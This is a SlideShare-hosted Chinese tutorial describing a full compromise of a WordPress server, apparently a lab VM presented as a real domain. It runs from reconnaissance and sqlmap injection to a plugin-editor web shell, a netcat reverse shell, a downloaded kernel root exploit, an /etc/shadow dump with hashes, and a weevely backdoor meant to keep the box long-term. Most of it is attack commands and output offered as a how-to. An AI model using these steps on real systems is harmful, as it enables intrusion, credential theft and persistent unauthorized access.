• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
一次详细的渗透Wordpress教程
 

一次详细的渗透Wordpress教程

on

  • 1,689 views

 

Statistics

Views

Total Views
1,689
Views on SlideShare
1,660
Embed Views
29

Actions

Likes
2
Downloads
16
Comments
0

1 Embed 29

http://www.wasecurity.com.cn 29

Accessibility

Categories

Upload Details

Uploaded via as Microsoft Word

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    一次详细的渗透Wordpress教程 一次详细的渗透Wordpress教程 Document Transcript

    • 一次详细的渗透教程 作者: Mohamed Ramadan & fsd010 个人博客:www.hackfsd.com27这次我们的目标是网站是: hack-test.com来 ping 下网站获取服务器的 ip现在我们得到地址 173.236.138.113 –这是目标网站服务器的 ip 地址.下面我们来找下在同服务器下的网站, 使用 sameip.org:(以防后面使用跨站入侵)
    • 在这 ip 上可以看到出有 26 个网站运行在 173.236.138.113 这服务器上ID Domain Site Link1 hijackthisforum.com hijackthisforum.com2 sportforum.net sportforum.net3 freeonlinesudoku.net freeonlinesudoku.net4 cosplayhell.com cosplayhell.com5 videogamenews.org videogamenews.org6 gametour.com gametour.com7 qualitypetsitting.net qualitypetsitting.net8 brendanichols.com brendanichols.com9 8ez.com 8ez.com1 hack-test.com hack-test.com01 kisax.com kisax.com11 paisans.com paisans.com21 mghz.com mghz.com31 debateful.com debateful.com41 jazzygoodtimes.com jazzygoodtimes.com
    • 5 1 fruny.com fruny.com 6 1 vbum.com vbum.com 7 1 wuckie.com wuckie.com 8 1 force5inc.com force5inc.com 9 2 virushero.com virushero.com 0 2 twincitiesbusinesspeernetwork.co twincitiesbusinesspeernetwork.com 1 m 2 jennieko.com jennieko.com 2 2 davereedy.com davereedy.com 3 2 joygarrido.com joygarrido.com 4 2 prismapp.com prismapp.com 5 2 utiligolf.com utiligolf.com 6 26 个网站运行在这服务器下 [173.236.138.113].很多 hacker 会用跨站的方式来入侵你的网站, 但是这次我们是直接面对你的服务器下的网站。. 我们要获取更多关于你的网站的信息,像下面的:1. DNS 记录 (A, NS, TXT, MX 和 SOA)2. 服务类型 (Apache, IIS, Tomcat)3. 注册信息 (公司或你个人的域名注册信息)4. 你的名字、地址、email 和电话。5. 网站运行的脚本类型 (php, asp, asp.net, jsp, cfm)6. 服务器系统(Unix,Linux,Windows,Solaris)7. 服务器所开放的端口 (80, 443, 21, 等等.) 下面我们来找下你网站的 dns 记录。我们到 “Who.is” 来查询下: Ok 发现网站的 dns 记录呢~
    • HACK-TEST.COM DNS 记录 Record Type TTL Priority Contenthack-test.com A 4 hours 173.236.138.113 ()hack-test.com SOA 4 hours ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400hack-test.com NS 4 hours ns1.dreamhost.comhack-test.com NS 4 hours ns3.dreamhost.comhack-test.com NS 4 hours ns2.dreamhost.comwww.hack-test.com A 4 hours 173.236.138.113 ()好的!下面我们来确定下服务器的服务类型:哈哈~看到木有服务器的解析类型为:Apache. 下面我们来确定下版本,HACK-TEST.COM 网站的信息IP: 173.236.138.113§网站状态: 活动服务类型: Apache网站趋势/排名: § 1 Month: 3,213,968 3 Month: 2,161,753浏览量: § 1 月: 2.0 3 月: 3.7现在我们来找下玉米的主人的注册信息:
    • 现在我们得到玉米主人的注册信息,下面在来找网站的运行的脚本类型和服务器的操作系统类型,服务版本,我们使用一个很 nb 的软件是 blacktrack5 R1 下的 whatweb:现在我们发现网站是使用 php 脚本的 wordpress 博客程序,服务器的操作系统是 FedoraLinux 和服务版本为 apache 2.2.15。接下来是查询服务器的开放端口。我们抄上 nmap 家伙1 – 发现服务器上所运行的服务。root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora)) MAC Address:00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect resultsathttp://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds2 – 服务器上的操作系统
    • root@bt:/# nmap -O hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET Nmapscan report for hack-test.com (192.168.1.2) Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hopOS detection performed. Please report any incorrect resultsathttp://nmap.org/submit/Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds操作系统是 Linux 2.6.22(Fedora Core 6) 和开放端口只有 80 端口现在我们要获取网站的敏感信息,像扫描漏洞的…sql 注入—sql 盲注– LFI – RFI – XSS –CSRF, 等等。我们用 Nikto.pl 来获取信息或许能得到一些漏洞信息:root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com- Nikto v2.1.4------------------------------------------------------------------+Target IP: 192.168.1.2+ Target Hostname: hack-test.com+ Target Port: 80+ Start Time: 2011-12-29 06:50:03--------------------------------------------------------------------++ Server: Apache/2.2.15 (Fedora)+ ETag header found on server, inode: 12748, size: 1475, mtime:0x4996d177f5c3b+ Apache/2.2.15 appears to be outdated (current is at leastApache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are alsocurrent.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE+ OSVDB-877: HTTP TRACE method is active, suggesting the host isvulnerable to XST+ OSVDB-3268: /icons/: Directory indexing found.+ OSVDB-3233: /icons/README: Apache default file found.
    • + 6448 items checked: 1 error(s) and 6 item(s) reported on remotehost+ End Time: 2011-12-29 06:50:37 (34 seconds)--------------------------------------------------------------------++ 1 host(s) tested我们同样用 backtrack 5 R1 下的 W3AF 来测试下. root@bt:/pentest/web/w3af#./w3af_guiStarting w3af, running on:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.输入目标网址然后选上 “audit” 选项:
    • 扫描结束以后我们可以看到:
    • 网站存在 sql 注入和 xss 跨站,等等漏洞!下面我们来探讨下 sql 注入漏洞:http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220这是注入地址.我们来测试下,
    • 我们发现利用失败,然后尝试用 sqlmap 来进行注入,跑出数据库里的信息来入侵网站用 sqlmap 和 –u 地址参数很快就可以看到提示 n 型回车继续你可以看到网站是基于报错型的注入,还有数据库的版本为 5。添加 “–dbs ”参数来查看数据库内的所有数据库。
    • 现在我们可以看到有 3 个数据库添加–D 和 –tables 参数来跑出 wordpress 的表这样我们可以看到全部表。我们要跑出“wp_users”里面的全部用户信息和密码之后控制后台。添加-T 参数来跑出 wp_users 表里的所有列。找到 22 个列
    • 我们要跑出列的字段里的管理员信息(账号和密码),添加-C 参数跑出用户信息。我们要找的是网站的敏感信息,找出网站的管理员账号和密码。现在管理员裸露在我们面前。可惜~密码加密的哦!ok 我们到“http://www.onlinehashcrack.com/free-hash-reverse.php”破解密文。22054
    • 可以清楚的看到密码是 q1w2e3q1w2e3用户名为 “GeorgeMiller”Wordpress 的后台管理路径是 “wp-admin ”哟~进去呢!ok 现在我们上马!上传 php shell shell 在网站服务器可以执行一些 linux 的命令。的我们编辑一个叫“Textile”的插件.
    • 点击编辑。我们将插入 php shell 代码到插件内,完成更新文件,然后在浏览器下浏览 shell。
    • 哇哈哈~~马子运行呢~现在我们拿下网站的权限,但是我们目标是服务器的 root 最高权限获得服务器下所有网站的全部权限。用 shell 里的“back-connect”功能来反弹到我们的地址 “192.168.1.6″ “5555″端口在我么连接之前我们要用 nc(netcat)来对端口 5555 来进行监听
    • 现在我们来连接看看:试下能不能执行一些 linux 命令。iduid=48(apache) gid=489(apache) groups=489(apache)pwd/var/www/html/Hackademic_RTB1/wp-content/pluginsuname –aLinux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45EST 2009 i686 i686 i386 GNU/LinuxId 命令是用来查看用户组的。pwd 命令式用来查看服务器当前目录的。uname –a 命令式用来查看用户信息和 kernel 的版本好了我们知道当前服务器的 kernel 的版本是 2.6.31.5-127.fc12.1686让我们来查看下 exploit-db.com 这版本“kernel 2.6.31 ”的漏洞信息 Date D A V Description Plat. Author2009-10-1 § - Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial 904 linu Simon5 of Service x Vallet
    • 2009-08-3 - Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte 137 linu Jon §1 Stack Disclosure Exploit 0 x Oberheide2009-08-2 - Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 105 linu Jon §5 5-Byte Stack Disclosure 9 x Oberheide2009-08-0 - Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte 106 linu Jon §4 Stack Disclosure Exploit 4 x Oberheide之后我尝试了列表下所有的漏洞,结果木有一个能用~~RP 有点低!后来我又尝试拿起大刀(新漏洞) Date D A V Description Plat. Author2010-10-1 - Linux RDS Protocol Local Privilege 997 linu Dan §9 Escalation 7 x Rosenberghttp://www.exploit-db.com/exploits/15285我打开这地址复制这地址http://www.exploit-db.com/download/15285然后在 nc 反弹回来的 shell 下执行这命令 wget http://www.exploit-db.com/download/15285 -O roro.c--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285 Resolvingwww.exploit-db.com... 199.27.135.111, 199.27.134.111 Connecting towww.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 301 Moved PermanentlyLocation: http://www.exploit-db.com/download/15285/ [following] --2011-12-2800:48:02-- http://www.exploit-db.com/download/15285/ Connecting towww.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 200 OKLength: 7154 (7.0K) [application/txt]Saving to: `roro.c0K ..
    • 我们用 wget 命令来获取 exploit-db.com 上的漏洞信息并用 –O 参数来重命名为 roro.c注意: linux kernel 大多数是由 c 开发的所以保存为.c 的扩展名,现在来看看漏洞利用程序的源代码。#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <string.h>#include <sys/ptrace.h>#include <sys/utsname.h>#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port) int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.n”); exit(-1);memset(&addr, 0, sizeof(addr));上面的代码都是用 c 写的。保存后我们将代码编译为 elf 形式gcc roro.c –o roro
    • 运行漏洞程序./roro[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...然后我们输入 id 命令,可以看到我们已经获得 root 的权限uid=0(root) gid=0(root)我们能查看 /etc/shadow 文件cat /etc/shadow root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::bin:*:14495:0:99999:7:::daemon:*:14495:0:99999:7:::adm:*:14495:0:99999:7:::lp:*:14495:0:99999:7:::
    • sync:*:14495:0:99999:7:::shutdown:*:14495:0:99999:7:::halt:*:14495:0:99999:7:::mail:*:14495:0:99999:7:::uucp:*:14495:0:99999:7:::operator:*:14495:0:99999:7:::games:*:14495:0:99999:7:::gopher:*:14495:0:99999:7:::ftp:*:14495:0:99999:7:::nobody:*:14495:0:99999:7:::vcsa:!!:14557::::::avahi-autoipd:!!:14557::::::ntp:!!:14557::::::dbus:!!:14557::::::rtkit:!!:14557::::::nscd:!!:14557::::::tcpdump:!!:14557::::::avahi:!!:14557::::::haldaemon:!!:14557::::::openvpn:!!:14557::::::apache:!!:14557::::::saslauth:!!:14557::::::mailnull:!!:14557::::::smmsp:!!:14557::::::smolt:!!:14557::::::sshd:!!:14557::::::pulse:!!:14557::::::gdm:!!:14557:::::: p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::mysql:!!:14981::::::再来看看 /etc/passwd 文件cat /etc/passwdroot:x:0:0:root:/root:/bin/bashroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/sync
    • shutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologinavahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/noLoginntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinrtkit:x:498:494:RealtimeKit:/proc:/sbin/nologinnscd:x:28:493:NSCD Daemon:/:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinavahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologinhaldaemon:x:68:491:HAL daemon:/:/sbin/nologinopenvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologinapache:x:48:489:Apache:/var/www:/sbin/nologinsaslauth:x:495:488:"Saslauthduser":/var/empty/saslauth:/sbin/nologinmailnull:x:47:487::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:486::/var/spool/mqueue:/sbin/nologinsmolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologinsshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:481::/var/lib/gdm:/sbin/nologinp0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bashmysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash我们可以用“john the ripper”这工具 破解这里所有用户密码.但是我们不会这么做,因为我们目的是长久的保住这台鸡鸡。但我们上传 weevely 后门好~我们开始动手!1 – weevely 后门的使用方法 :root@bt:/pentest/backdoors/web/weevely# ./main.pyWeevely 0.3 - Generate and manage stealth PHP backdoors.
    • Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/Usage: main.py [options]Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the give file, in the formlabel,url,password where label is optional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor .-u URL, --url=URL Remote backdoor URL .2 用 weevely 建立一个 hax.php 后门文件密码为 koko:root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Backdoor file hax.php created with password koko.
    • 上传后我们来进行连接root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Using method system().+ Retrieving terminal basic environment variables .[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]测试我们的 hax.php 后门。结论:在这篇文章我们学习了一些黑客技术,我希望你能用于学习而不是去破坏,希望你喜欢这篇文章!谢谢!在下篇文章我们学习如何从这些攻击手段来保护我们的网站和服务器。是你的网站和服务器更加安全。